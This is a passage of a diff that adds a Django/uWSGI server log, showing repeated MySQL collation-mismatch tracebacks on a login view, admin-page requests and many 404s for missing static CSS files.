+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 96/149] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:33 2021] POST /login/ => generated 183350 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 97/150] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:44:34 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 98/151] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:34 2021] POST /login/ => generated 183350 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 99/152] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:44:44 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 100/153] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:44:45 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 101/154] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:44:45 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 102/155] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 103/156] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 104/157] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 105/158] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 106/159] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:44:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 107/160] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 108/161] 219.228.146.146 () {38 vars in 778 bytes} [Thu Jan 14 07:44:45 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 109/162] 219.228.146.146 () {38 vars in 848 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 110/163] 219.228.146.146 () {38 vars in 812 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 111/164] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:44:46 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 112/165] 219.228.146.146 () {40 vars in 900 bytes} [Thu Jan 14 07:44:47 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 113/166] 219.228.146.146 () {40 vars in 902 bytes} [Thu Jan 14 07:44:47 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 114/167] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 115/168] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 116/169] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 117/170] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 118/171] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:44:48 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 119/172] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 120/173] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 121/174] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 122/175] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:44:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.253 client_port: 62153] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.253 client_port: 62409] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 2069|app: 0|req: 123/176] 219.228.146.253 () {48 vars in 973 bytes} [Thu Jan 14 07:45:13 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 124/177] 219.228.146.253 () {40 vars in 925 bytes} [Thu Jan 14 07:45:13 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 125/178] 219.228.146.253 () {40 vars in 927 bytes} [Thu Jan 14 07:45:13 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/179] 219.228.146.253 () {38 vars in 872 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/180] 219.228.146.253 () {38 vars in 806 bytes} [Thu Jan 14 07:45:14 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/181] 219.228.146.253 () {38 vars in 818 bytes} [Thu Jan 14 07:45:14 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/182] 219.228.146.253 () {38 vars in 835 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/183] 219.228.146.253 () {38 vars in 847 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/184] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/185] 219.228.146.253 () {38 vars in 811 bytes} [Thu Jan 14 07:45:14 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/186] 219.228.146.253 () {38 vars in 787 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/187] 219.228.146.253 () {38 vars in 799 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/188] 219.228.146.253 () {38 vars in 875 bytes} [Thu Jan 14 07:45:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/189] 219.228.146.253 () {38 vars in 797 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/190] 219.228.146.253 () {38 vars in 871 bytes} [Thu Jan 14 07:45:16 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 126/191] 219.228.146.253 () {38 vars in 885 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 127/192] 219.228.146.253 () {38 vars in 897 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 128/193] 219.228.146.253 () {38 vars in 889 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 129/194] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 130/195] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 131/196] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 132/197] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 133/198] 219.228.146.253 () {38 vars in 821 bytes} [Thu Jan 14 07:45:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 134/199] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:17 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 135/200] 219.228.146.253 () {40 vars in 930 bytes} [Thu Jan 14 07:45:23 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 136/201] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 137/202] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 138/203] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 139/204] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 140/205] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 141/206] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 142/207] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:23 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 143/208] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 144/209] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:45:23 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 145/210] 219.228.146.253 () {40 vars in 930 bytes} [Thu Jan 14 07:45:24 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 146/211] 219.228.146.253 () {40 vars in 932 bytes} [Thu Jan 14 07:45:25 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 147/212] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 149/213] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:45:46 2021] GET /kind-manage/? => generated 6423 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
